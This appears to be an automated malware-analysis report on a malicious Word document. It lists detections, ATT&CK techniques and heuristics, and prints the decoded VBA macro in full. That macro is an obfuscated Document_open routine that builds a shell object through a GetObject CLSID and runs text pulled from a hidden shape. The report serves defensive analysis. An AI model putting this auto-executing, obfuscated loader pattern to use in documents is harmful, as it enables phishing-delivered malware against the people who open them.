MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample contains a VBA macro with a Document_Open auto-execution routine. This macro references PowerShell and uses obfuscated commands, indicating an attempt to download and execute a secondary payload. The presence of a `GetObject` call further suggests interaction with external resources or objects. The ClamAV detection confirms the malicious nature of the file.
Heuristics 8
-
ClamAV: Doc.Malware.00536d-6764534-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6764534-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set Ewdri = CVar(GetObject(ouqjA + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + mBTzdSUYj)) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9106 bytes |
SHA-256: c7305b502be0f7c231d3802938f4752edf314a459ad20f86e73d8f32d47e0bb3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
156 of 242 identifiers look randomly generated (e.g. 'FAfIzWWsGWYtKl') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FAfIzWWsGWYtKl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
HoACQY = (jcPdjjuFO - Oct(anQGc) * hivGYNWa - Sgn(143288678) - 33543119 + Fix(jXzfSDUB) + 3040033139# + 231324654 / 294254959 / pUzloPBzE)
Select Case BSYURUW
Case 37902714
HbwOiQYI = CLng(234415112)
FiDpmGmab = Int(KUHjBVfH)
Case 323852693
ziotlRqG = Hex(99963174)
QHRAzww = CStr(191544228 * CByte(OfuuXimT))
End Select
On Error Resume Next
AXDsdiAC = (LZOqVK - Oct(rWzAr) * NZPaR - Sgn(159165490) - 173836489 + Fix(ABAaJihZ) + 1615969149 + 164311630 / 43959458 / mCaVpQi)
Select Case LSUlw
Case 2780115
dcCNb = CLng(183034220)
LYOPMcXS = Int(YtQNKwulB)
Case 271676517
VhjOiI = Hex(161339160)
wVLiz = CStr(20334341 * CByte(CGZDGktUw))
End Select
On Error Resume Next
zUvnb = (OkNPHPR - Oct(CKIlqwL) * cNCWKLIoO - Sgn(8185466) - 12852306 + Fix(DzkiDXa) + 2174644989# + 341913130 / 317621340 / YiKCsGlcB)
Select Case ErhkFSDb
Case 165863507
GNoXE = CLng(172777780)
iSXivjQ = Int(ozIQhcY)
Case 1291482
zFDuzFWF = Hex(176049624)
qKunzScCK = CStr(196126880 * CByte(JLQGR))
End Select
On Error Resume Next
CoZQzzj = (EbkMkHpi - Oct(cqrqcuFXq) * JVSHiDIC - Sgn(230399101) - 191256509 + Fix(jHVvM) + 2607844859# + 96354877 / 247424474 / mMCFSdLi)
Select Case tUtJNaS
Case 253127075
BIbFGF = CLng(272812185)
jWuQGqlBz = Int(TMpFsadpI)
Case 74202221
tvdZTNd = Hex(86978657)
FwQYtpoJ = CStr(257379903 * CByte(IINdwZi))
End Select
Set LrYiNzYwX = Shapes("fbiujpXX")
On Error Resume Next
iwvtQts = (zwrjW - Oct(tcwOMGKv) * UbSDAJhN - Sgn(144459639) - 251476901 + Fix(ATGXZk) + 548722719 + 84962064 / 131911859 / KHnWWzC)
Select Case snPjQ
Case 174519758
zprsRl = CLng(143999246)
KoZWbobwz = Int(BKUfhdL)
Case 206995689
dwwQD = Hex(210837934)
bvQUC = CStr(296422375 * CByte(NchzbaRQ))
End Select
On Error Resume Next
iEkvEZ = (flNRVzw - Oct(CMIRtu) * TvAJh - Sgn(297718464) - 210741429 + Fix(ZoGahuKwN) + 1537320879 + 28533274 / 32655571 / NYRYJ)
Select Case LYpCzaj
Case 247716181
vusfznod = CLng(103868188)
PRsQvup = Int(wFWilYVU)
Case 163307639
mIzAIVAS = Hex(204409385)
FPYvBzt = CStr(36944450 * CByte(ItIIlh))
End Select
On Error Resume Next
CRwcAz = (pYXufwcM - Oct(AFVzzQB) * IrTsEjlvc - Sgn(21156597) - 200190861 + Fix(tjGlLpNFE) + 819484279 + 183699852 / 48201939 / TFaHQP)
Select Case QEUJjpkp
Case 252287609
CvwQkRzkl = CLng(64332013)
vpvPM = Int(ldKnMns)
Case 200424298
PzEWFYTF = Hex(63022435)
JAiobXfF = CStr(228974262 * CByte(OYtUOzL))
End Select
On Error Resume Next
ROJblEEjH = (jGuqPHhw - Oct(pimjPhaN) * tfoHu - Sgn(166090225) - 274857245 + Fix(qEwzkiBo) + 1686895409 + 223058809 / 143173820 / tfUrjY)
Select Case ifutLr
Case 7755327
cAbMVAbRc = CLng(327080428)
FAlvpAEv = Int(NKzXV)
Case 46381346
IvLnIj = Hex(263498371)
ozVARRN = CStr(290422507 * CByte(CTRtjFtGv))
End Select
Ajiwjlj = "" + IFmwCCfO + ckmjCbD + LrYiNzYwX.TextFrame.TextRange.Text + QjhJJZq + IFMqtSY
On Error Resume Next
hObcB = (EjrYsjPOA - Oct(qmwmcvtLT) * RPUZBj - Sgn(52853806) - 30710505 + Fix(jjZsNPh) + 2934902469# + 306105290 / 167085508 / PjORYPORb)
Select Case UPIlapLR
Case 155351479
bLpTP = CLng(115758818)
lXuCzmXAk = Int(DAlVq)
Case 195173566
LQQGmaWa = Hex(150753811)
UDqvBG = CStr(144617306 * CByte(ujjVdlk))
End Select
On Error Resume Next
zwIzHlOaZ = (JClGnTzRa - Oct(SjXttqL) * HGclobo - Sgn(288946867) - 69839727 + Fix(scCdkb) + 451962509 + 201651147 / 132841807 / IksAuf)
Select Case NbPERZn
Case 122909175
UXNJRv = CLng(57102574)
ZwbpzvmO = Int(BSXOcrJ)
Case 22277359
QvIaCPK = Hex(116440399)
jRKtM = CStr(183616865 * CByte(awEjN))
End Select
On Error Resume Next
jGWXvokzR = (XRDLKS - Oct(tTbGRzojP) * pwzjvizBH - Sgn(256610098) - 86386642 + Fix(vloWqiRZ) + 2465488339# + 324595828 / 267343227 / NQMqS)
Select Case iqfov
Case 20109044
fciEKD = CLng(206832134)
LXpSuJG = Int(pNrHwS)
Case 203796951
JiAEWCG = Hex(279084661)
CKGiVauJ = CStr(143421411 * CByte(sWYXz))
End Select
On Error Resume Next
bXrfwbvVn = (wwzKM - Oct(RwzOz) * MqNBrKtn - Sgn(40210016) - 105866463 + Fix(XLcufF) + 110322309 + 339323102 / 279564506 / htjAwJRht)
Select Case zvpLASwk
Case 241282756
AzjiZzk = CLng(95816955)
tvOHtizi = Int(tBbFN)
Case 203874349
cVRuNJ = Hex(116362410)
OriNAa = CStr(335523060 * CByte(Dwzpkov))
End Select
Set Ewdri = CVar(GetObject(ouqjA + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + mBTzdSUYj))
On Error Resume Next
WLnjSQtPd = (zEMwhR - Oct(pHRIYBYca) * pVlOaJYlQ - Sgn(155487012) - 206008469 + Fix(KLGmr) + 2035115279 + 93900100 / 105892582 / SwGrMz)
Select Case wKOHrVDu
Case 283380977
YuoMR = CLng(302140101)
ozFClK = Int(OKiXZfWOJ)
Case 252083884
GIYJoIMv = Hex(269921279)
TcDAC = CStr(263270989 * CByte(OukNz))
End Select
On Error Resume Next
pJDidw = (DUiEzYw - Oct(YVplwitsj) * YOviXlMXz - Sgn(287299774) - 127661044 + Fix(YFZvHQ) + 1126630229 + 267096907 / 249435963 / OVXmnzchw)
Select Case XjEkZZ
Case 322242017
rcYEiHzjL = CLng(9304548)
cbrNiAa = Int(kwNvS)
Case 311377298
uoApV = Hex(228358253)
YwJVJq = CStr(109150203 * CByte(DnaKTqfV))
End Select
On Error Resume Next
XihzwQKwT = (LXzAFz - Oct(CLUwEL) * NIwjFzusQ - Sgn(52442072) - 11808054 + Fix(GidjStQ) + 3253320559# + 243760066 / 66629173 / dkUfVud)
Select Case STqjqUdsV
Case 117462979
Hrwiqf = CLng(167741261)
CFnNGDhS = Int(lRYwmMiHQ)
Case 339631637
LoAvfSCj = Hex(205736252)
dAwPb = CStr(274200740 * CByte(FkfJBjH))
End Select
Const FJjBlq = 0
On Error Resume Next
TPrCzZj = (LdDEYVzER - Oct(qiDVPRaM) * tGNZhFkH - Sgn(44605893) - 87563822 + Fix(GTiqYLwFS) + 3362848259# + 278861285 / 86808958 / JYQTzzZb)
Select Case kmnwEVwo
Case 94515912
rZaWwMzDV = CLng(144066463)
pDthPJpQJ = Int(nRVjv)
Case 19389211
HaGikzW = Hex(40673425)
BUGAwDFq = CStr(313227133 * CByte(uQoMJXEl))
End Select
On Error Resume Next
iKNqzmQkJ = (LTuLJ - Oct(FLBwo) * uXGEwS - Sgn(259613212) - 328686462 + Fix(RfjpSwSu) + 274383109 + 141289599 / 94208003 / wDPJJAm)
Select Case ZkbIL
Case 108007356
juqwzLVuo = CLng(70643063)
qMnQzaa = Int(wUqvmSAqM)
Case 220204557
bdCGi = Hex(339035963)
XRLaJb = CStr(333013397 * CByte(KZUImAiP))
End Select
EnAJW = Array(vPPEFXbhH, Ewdri.Run!(Ajiwjlj, FJjBlq), KJLkLin)
On Error Resume Next
tBNfL = (WDwjlVM - Oct(HukkA) * DNfvR - Sgn(154639735) - 177770492 + Fix(TSiSLDK) + 2588209659# + 341136237 / 103295658 / raWDEP)
Select Case QYLNnJEbz
Case 212536909
ROnAzkd = CLng(2407874)
JIzUuV = Int(IchJbja)
Case 46308227
KFfZO = Hex(237543396)
iRiBc = CStr(282109780 * CByte(maEwhHb))
End Select
On Error Resume Next
dAXHKZ = (fJNwq - Oct(BvnwTk) * khZPGT - Sgn(30127488) - 13682786 + Fix(ECjsb) + 2821991869# + 168080845 / 203082425 / DOAkSWh)
Select Case NAahFQM
Case 60651216
vbHArUEY = CLng(33938422)
MzoKVI = Int(QWSAPCi)
Case 192525831
EbZwm = Hex(156388877)
rvwXWLtv = CStr(76169672 * CByte(LVfZpE))
End Select
On Error Resume Next
rHDHpHw = (dzXmWzuhX - Oct(skploSK) * NFzZRnI - Sgn(303271704) - 293275591 + Fix(vTdfOppn) + 956785629 + 143843726 / 4485701 / TOVOPqnGS)
Select Case zKtswEjj
Case 199860629
HIlDsMW = CLng(3343364)
BEoiOmiDC = Int(RGlTLWT)
Case 250276954
rlHirXr = Hex(69508930)
RVCUmLR = CStr(213568341 * CByte(fiGPA))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.